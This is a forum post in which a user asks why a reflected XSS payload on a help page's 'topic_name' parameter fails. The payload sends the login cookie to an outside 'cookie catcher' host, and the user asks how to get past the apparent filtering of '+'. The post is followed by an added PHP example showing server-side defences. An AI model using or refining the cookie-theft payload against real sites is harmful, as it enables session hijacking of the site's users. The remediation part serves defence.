Hi All,
I have a problem with a site that seems vulnerable to XSS!
[tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]
The above will display the details of the login cookie. However, I can’t get the following to work:
This however:
[tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]
Won't work!
I’ve tried converting it to HEX etc. Nothing seems to work. Am I doing something wrong, or are there security features in modern browsers that prevent this?
When I view the HTML source however, I notice something interesting:
[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]
It would appear to have filtered out the plus (+) symbol? When I type the URL:
[tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]
into my browser and hit go, I get a JavaScript error. It says it expected a semicolon.
I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem. Is there anything else I can do?
Thanks,
S.
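
For whoever maintains a page that behaves like the one in this post, here is how the reflected `topic_name` value and the script-readable login cookie could be closed off on the server. This is an added example, not part of the original post and not the site's code; the handler layout, the `h()` helper and the allowlist pattern are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical topic.php handler (assumed layout, not the real site's code).

// 1. Mark the session cookie HttpOnly so document.cookie cannot read it,
//    Secure so it only travels over HTTPS, and SameSite to limit cross-site use.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// 2. Defence in depth: with this policy the browser refuses inline <script>,
//    so a missed encoding bug elsewhere does not become script execution.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('Content-Type: text/html; charset=UTF-8');

/** Encode untrusted text for an HTML body or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3. Validate the parameter against what a topic name can legitimately be.
//    $_GET values can be arrays (topic_name[]=x), so check the type first.
$raw = $_GET['topic_name'] ?? '';
$valid = is_string($raw) && preg_match('/\A[\w \-]{1,64}\z/u', $raw) === 1;

if (!$valid) {
    http_response_code(400);
    echo '<h1>Unknown help topic</h1>';
    exit;
}

// 4. Encode at the point of output, even though the value passed validation.
//    The unsafe pattern this replaces is echoing the raw value into the page:
//        echo "<h1>Help: $raw</h1>";
echo '<h1>Help: ', h($raw), '</h1>';
```

With the encoding in step 4 alone, the `<script>` string from the post is rendered as visible text instead of being executed; steps 1 and 2 limit the damage if another output path is missed.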